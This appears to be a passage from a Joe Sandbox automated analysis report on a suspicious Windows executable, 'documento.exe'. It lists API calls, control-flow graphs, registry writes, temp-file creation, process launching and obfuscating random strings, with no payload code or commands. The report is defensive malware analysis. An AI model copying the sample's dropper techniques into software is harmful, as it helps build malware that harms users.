                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: rghtten
                                                • API String ID: 2531174081-1594702312
                                                • Opcode ID: 999e89093a23ea19cfb07457cadf61976c7c5e7560eec41fbd50c1d03779383c
                                                • Instruction ID: eca0c9fc351864773e3873b1aaef0297ce596284c077fb9535b250fc548d2f5f
                                                • Opcode Fuzzy Hash: 999e89093a23ea19cfb07457cadf61976c7c5e7560eec41fbd50c1d03779383c
                                                • Instruction Fuzzy Hash: 0D219DB1900119BBDF119FA5CD849DEBFB9EF44354F14807AFA04B6290C7798A41CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402E9F Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 568 402e9f-402eb3 569 402eb5 568->569 570 402ebc-402ec4 568->570 569->570 571 402ec6 570->571 572 402ecb-402ed0 570->572 571->572 573 402ee0-402eed call 40307b 572->573 574 402ed2-402edb call 403091 572->574 578 403032 573->578 579 402ef3-402ef7 573->579 574->573 582 403034-403035 578->582 580 40301b-40301d 579->580 581 402efd-402f1d GetTickCount call 406175 579->581 583 403066-40306a 580->583 584 40301f-403022 580->584 592 403071 581->592 594 402f23-402f2b 581->594 586 403074-403078 582->586 587 403037-40303d 583->587 588 40306c 583->588 589 403024 584->589 590 403027-403030 call 40307b 584->590 595 403042-403050 call 40307b 587->595 596 40303f 587->596 588->592 589->590 590->578 601 40306e 590->601 592->586 598 402f30-402f3e call 40307b 594->598 599 402f2d 594->599 595->578 605 403052-40305e call 405a17 595->605 596->595 598->578 607 402f44-402f4d 598->607 599->598 601->592 610 403060-403063 605->610 611 403017-403019 605->611 609 402f53-402f70 call 406195 607->609 614 403013-403015 609->614 615 402f76-402f8d GetTickCount 609->615 610->583 611->582 614->582 616 402fd2-402fd4 615->616 617 402f8f-402f97 615->617 620 402fd6-402fda 616->620 621 403007-40300b 616->621 618 402f99-402f9d 617->618 619 402f9f-402fca MulDiv wsprintfA call 404f16 617->619 618->616 618->619 626 402fcf 619->626 623 402fdc-402fe1 call 405a17 620->623 624 402fef-402ff5 620->624 621->594 625 403011 621->625 629 402fe6-402fe8 623->629 628 402ffb-402fff 624->628 625->592 626->616 628->609 630 403005 628->630 629->611 631 402fea-402fed 629->631 630->592 631->628
                                                APIs
                                                • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EFD
                                                • GetTickCount.KERNEL32(0040A8D8,00004000), ref: 00402F7E
                                                • MulDiv.KERNEL32 ref: 00402FAB
                                                • wsprintfA.USER32 ref: 00402FBB
                                                Strings
                                                • ... %d%%, xrefs: 00402FB5
                                                • scrams cocainist schizognathous montage nedskrivningstidspunkter drunks sceneteknikers charm diffuses dragonish lserettighedernelyknsker konkluder cyclicality spaanskraberen kartoteksstyring antilabour sortebrdres,foraarssemestret inbond raaskitsen housewive, xrefs: 00402EC6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$scrams cocainist schizognathous montage nedskrivningstidspunkter drunks sceneteknikers charm diffuses dragonish lserettighedernelyknsker konkluder cyclicality spaanskraberen kartoteksstyring antilabour sortebrdres,foraarssemestret inbond raaskitsen housewive
                                                • API String ID: 551687249-342867682
                                                • Opcode ID: 6f3418d20d5a7b16bbf07f2caf8b388666ee65f0263a646cde66ce9cfbfa83ed
                                                • Instruction ID: 7e4dc47457cc3da2c56257e898c37067349407ab53618b81eea50406b68a50e3
                                                • Opcode Fuzzy Hash: 6f3418d20d5a7b16bbf07f2caf8b388666ee65f0263a646cde66ce9cfbfa83ed
                                                • Instruction Fuzzy Hash: B9517C72902219ABDF10DF65DA04A9F7BB8EB40755F14413BF800B72C4C7789E51DBAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406028 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 632 406028-406048 GetSystemDirectoryA 633 40604a 632->633 634 40604c-40604e 632->634 633->634 635 406050-406058 634->635 636 40605e-406060 634->636 635->636 637 40605a-40605c 635->637 638 406061-40608f wsprintfA LoadLibraryA 636->638 637->638
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603F
                                                • wsprintfA.USER32 ref: 00406078
                                                • LoadLibraryA.KERNEL32(?), ref: 00406088
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%s.dll$\
                                                • API String ID: 2200240437-500877883
                                                • Opcode ID: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                • Instruction ID: d5163558ffe5aed4278454506076ff52b4f001f8688a9739bf5e409abac40a62
                                                • Opcode Fuzzy Hash: 1d5f31d115a59bc75170d0b5e25867174e87b8d420fe74ce0eee88fcfc4f8209
                                                • Instruction Fuzzy Hash: C6F0BB7094010A9BDF15DB78DC0DEFB365CEB08304F14057AA547E10D2EA79E975CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040599F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 639 40599f-4059a9 640 4059aa-4059d5 GetTickCount GetTempFileNameA 639->640 641 4059e4-4059e6 640->641 642 4059d7-4059d9 640->642 644 4059de-4059e1 641->644 642->640 643 4059db 642->643 643->644
                                                APIs
                                                • GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documento.exe",004030D7,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 004059B3
                                                • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059CD
                                                Strings
                                                • "C:\Users\user\Desktop\documento.exe", xrefs: 0040599F
                                                • nsa, xrefs: 004059AA
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004059A2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\documento.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-4267632705
                                                • Opcode ID: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                • Instruction ID: 3f05255bf470524d05267fbe77a66a547c73f63e6c4f6eb4cae2c62e5f282410
                                                • Opcode Fuzzy Hash: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                • Instruction Fuzzy Hash: D3F0E272708204ABEB108F55EC04B9B7B9CDF91720F10803BFA08DA180D2B098108BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402364 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 645 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 652 4023b0-4023b8 645->652 653 4028cf-4028de 645->653 655 4023c8-4023cb 652->655 656 4023ba-4023c7 call 402a3a lstrlenA 652->656 659 4023db-4023de 655->659 660 4023cd-4023da call 402a1d 655->660 656->655 661 4023e0-4023ea call 402e9f 659->661 662 4023ef-402403 RegSetValueExA 659->662 660->659 661->662 667 402405 662->667 668 402408-4024de RegCloseKey 662->668 667->668 668->653
                                                APIs
                                                • RegCreateKeyExA.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 004023A2
                                                • lstrlenA.KERNEL32(00409C00,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                • RegSetValueExA.KERNEL32(?,?,?,?,00409C00,00000000), ref: 004023FB
                                                • RegCloseKey.KERNEL32(?), ref: 004024D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID:
                                                • API String ID: 1356686001-0
                                                • Opcode ID: e46d98766fca384b0b429333aaa9b9cfca7b69a45cfa3caf0dfdbd84f9289746
                                                • Instruction ID: 133b3897f1a97e650f74ae2c97eeacc267919fe8998a33790bec377d3be5ae35
                                                • Opcode Fuzzy Hash: e46d98766fca384b0b429333aaa9b9cfca7b69a45cfa3caf0dfdbd84f9289746
                                                • Instruction Fuzzy Hash: F61163B1E00108BFEB10AFA4DE89EAF7A79EB54358F10403AF505B61D1D6B85D419A28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 796 4015b3-4015c6 call 402a3a call 405808 801 4015c8-4015db call 40579a 796->801 802 40161c-40161f 796->802 809 4015f3-4015f4 call 405459 801->809 810 4015dd-4015e0 801->810 804 401621-40163c call 401423 call 405cfd SetCurrentDirectoryA 802->804 805 40164a-4021c9 call 401423 802->805 817 4028cf-4028de 804->817 822 401642-401645 804->822 805->817 820 4015f9-4015fb 809->820 810->809 814 4015e2-4015e9 call 405476 810->814 814->809 826 4015eb-4015f1 call 4053dc 814->826 824 401612-40161a 820->824 825 4015fd-401602 820->825 822->817 824->801 824->802 828 401604-40160d GetFileAttributesA 825->828 829 40160f 825->829 826->820 828->824 828->829 829->824
                                                APIs
                                                  • Part of subcall function 00405808: CharNextA.USER32(?), ref: 00405816
                                                  • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                  • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                  • Part of subcall function 004053DC: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040541F
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare,00000000,00000000,000000F0), ref: 00401634
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare, xrefs: 00401629
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\Temp\Deinotherium\Pugilist\Unreturnableness\Tapeta\Vulgare
                                                • API String ID: 1892508949-123516722
                                                • Opcode ID: cef5982d16b96abbf50bc7d629446ce069799693c36b8a03ace087d6155603a0
                                                • Instruction ID: 033a10bc0c18a89e8a0df43fa9022a024a55b03552da94b7695e97ed969a6887
                                                • Opcode Fuzzy Hash: cef5982d16b96abbf50bc7d629446ce069799693c36b8a03ace087d6155603a0
                                                • Instruction Fuzzy Hash: BD112B35504141ABDF217B650C409BF37B0E9A2325738463FE582B22D2C63C0943A63F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040548E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                • CloseHandle.KERNEL32(?), ref: 004054C4
                                                Strings
                                                • Error launching installer, xrefs: 004054A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                • Instruction ID: 371522acfb7cd9539d7ae69e543ca64f087bc7c9f75cc5940c594e3c03f6d28b
                                                • Opcode Fuzzy Hash: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                • Instruction Fuzzy Hash: D6E04FF1A102097FEB009BA0EC05F7B7BBCE754704F404471BD01F21A0D678A8408A79
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406779 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                • Instruction ID: cf83b5f92aa564cc298776c77b2bdd28f1825052710f2ecdbdb4cfcb1c159722
                                                • Opcode Fuzzy Hash: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                • Instruction Fuzzy Hash: 92A13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040697A Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                • Instruction ID: cdde4d58dff4e4a9c83cf0d0e57cddb7afde41a65112cf45587a3a44971c93cd
                                                • Opcode Fuzzy Hash: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                • Instruction Fuzzy Hash: 7A911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406690 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                • Instruction ID: 210b764e34932ffe60d6cfe39aea5744945828095a37428d8e8ad2b7e06fd55b
                                                • Opcode Fuzzy Hash: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                • Instruction Fuzzy Hash: 0B814671E04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C7789A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406195 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                • Instruction ID: d8cce1150c04716a98830c198e93b549954248a52dda193404c5f2b9195ff2ae
                                                • Opcode Fuzzy Hash: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                • Instruction Fuzzy Hash: 89815771E04228CBDF24CFA8C8447ADBBB1FB44315F1181AED856BB281D7786A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004065E3 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
